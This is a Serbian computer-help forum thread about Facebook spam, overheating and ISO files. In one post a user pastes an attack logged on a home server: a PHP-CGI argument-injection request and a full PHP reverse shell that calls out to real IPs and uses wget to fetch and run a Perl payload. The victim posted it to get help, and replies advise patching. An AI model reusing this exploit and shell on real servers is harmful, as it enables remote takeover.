August 29, 201410 yr Obrisao, cekirao disk preko cmd-a kaze da je sve u redu nema bad sectora tako da sam odahnuo sto se toga tice. Ali moram posle da odradim reinstal.
August 29, 201410 yr On 21. 8. 2014. at 6:45, Vapad said: Promena lozinke prvo. Onda odeš u podešavanja i pobrišeš sve alplikacije. Pitanje, da li ima ikonicu fejsbuka na desktu, da li ima one razne tulbarove, facebook instant mesindžer ili nesto takvo? Novi momenti. Brisanje neke aplikacije je sprecilo prokletinju da spamuje taj neki link ali nastavlja da je ubacuje u grupe i posle brisanja svih aplikacija A activity logu samo bude was added to random group by neki lik. Koliko ja vidim samo prijatelji mogu da te dodaju u grupe a ovi likovi joj nisu prijatelji. Totalno sam zbunjen. Moguce da ih nekako sprijatelji pa anfrenduje posle dodavanja u grupe. Al opet hebeno kako? Poslednjih 24h se nije ni logovala na fejs tako da to nije neophodan uslov da bi je ubacivali u grupe. Sve neke kretenske grupe sa Novog Zelanda. Uglavnom vezane za kola. Edited August 29, 201410 yr by katamaran
August 30, 201410 yr Youtube mi posle 15ak minuta gasi računar?!Ima li neko ideju šta može biti u pitanju?Pregrejavanje neko pretpostavljam?edit: desktop je u pitanju Edited August 30, 201410 yr by maheem
August 31, 201410 yr napalo mi http server kod kuće sa ovim POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 što se dekodira u ovo POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1 ovo su POST data, iz mog log-a: Quote 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] <?php 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] set_time_limit(0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $ip = '91.121.105.21'; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $port = 22; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $chunk_size = 1400; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $write_a = null; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $error_a = null; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; wget 208.85.177.238/speedtest/.a/hb/php01 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7'; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 0; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $debug = 0; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (function_exists('pcntl_fork')) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $pid = pcntl_fork(); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($pid == -1) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Can't fork"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($pid) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (posix_setsid() == -1) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("Error: Can't setsid()"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 1; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } else { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("WARNING: Failed to daemonise."); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] chdir("/"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] umask(0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $sock = fsockopen($ip, $port, $errno, $errstr, 30); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$sock) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("$errstr ($errno)"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $descriptorspec = array( 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 0 => array("pipe", "r"), 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 1 => array("pipe", "w"), 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 2 => array("pipe", "w") 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $process = proc_open($shell, $descriptorspec, $pipes); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!is_resource($process)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Can't spawn shell"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[0], 0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[1], 0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[2], 0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($sock, 0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] while (1) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (feof($sock)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Shell connection terminated"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] break; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (feof($pipes[1])) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Shell process terminated"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] break; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $read_a = array($sock, $pipes[1], $pipes[2]); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($sock, $read_a)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("SOCK READ"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($sock, $chunk_size); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("SOCK: $input"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($pipes[0], $input); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($pipes[1], $read_a)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDOUT READ"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($pipes[1], $chunk_size); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDOUT: $input"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($sock, $input); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($pipes[2], $read_a)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDERR READ"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($pipes[2], $chunk_size); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDERR: $input"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($sock, $input); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($sock); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[0]); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[1]); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[2]); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] proc_close($process); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] function printit ($string) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$daemon) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] print "$string 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] "; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ?> kaj da radim sad, tj. šta da proveravam
August 31, 201410 yr mozda je samo bot, pogledaj sta ovi kazu, i related pitanja. http://stackoverflow.com/questions/20576530/is-my-site-being-attacked-suhosin-simulation-very-strange-activity-in-ip-log http://stackoverflow.com/questions/18008646/can-anyone-explain-this-php-code-injection-attack-to-me Edited August 31, 201410 yr by djili
August 31, 201410 yr Nastavljam istragu sekinog druzenja sa novozelandjanima Cela prica pocinje lajkovanjem nekog klipa na nekoj nasoj retardiranoj i nadasve seems legit stranici sa video klipovima. Ne bih da linkujem onu kretenariju od stranice... Tu je zet njenim nalogom lajkovao neki video da bi ga pogledao pa se navodno u pola posla setio da smo mu rekli da to ne radi pa je navodno odustao. uglavnom njoj se tada pojavljuje likes a kretenski video on kretenskisajt.com i posle toga krece ubacivanje u NZ grupe i spamovanje WATCH MOVIES FREE AND ENJOY nekisajtzastrimovanjefilmova.info Utepavanjem aplikacija sprecio sam spamovanje ali u grupe i dalje upada. Jedino sada smanjenim intenzitetom od oko dve dnevno. Obrisao sam joj sve aplikacije i igre i cak iskljucio platformu sa aplikacijama ali nista ne pomaze edit: kad sam guglao ono sto je spamovala pojavljuje se jos nasih ljudi koji to postuju tako da sam siguran da je ona stranica uzrok. Edited August 31, 201410 yr by katamaran
August 31, 201410 yr skino nesto sa kioksa, i sad u tom folderu izmedju ostalog imam 5 iso fajlova od 200-500 mb. sta sad da radim?
August 31, 201410 yr On 31. 8. 2014. at 13:54, ToniAdams said: skino nesto sa kioksa, i sad u tom folderu izmedju ostalog imam 5 iso fajlova od 200-500 mb. sta sad da radim? Narežeš na CD.
August 31, 201410 yr On 30. 8. 2014. at 16:40, renne said: pregrejavanje, očisti vent na procu fala renne. učiniću to. danas radi ok al vreme mu je izgleda za penziju
August 31, 201410 yr On 31. 8. 2014. at 13:55, wall said: Narežeš na CD. Edit: A ako ti ne treba na cd-ovima možeš raspakovati na disku... Ne znam šta je...
August 31, 201410 yr On 31. 8. 2014. at 13:55, wall said: Narežeš na CD. so 19th century :) instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima
August 31, 201410 yr On 31. 8. 2014. at 13:58, katamaran said: so 19th century :) instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima :)Možda mu treba tako.
August 31, 201410 yr On 31. 8. 2014. at 2:48, mei said: kaj da radim sad Ne mogu sad da čitam kôd s moba, ali svakako updateuj PHP i nemoj da držiš više interpreter u /cgi/bin/.
August 31, 201410 yr On 31. 8. 2014. at 13:58, katamaran said: so 19th century :) instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima a cekaj, ubacim svih 5 ili je svaki zasebno?
Create an account or sign in to comment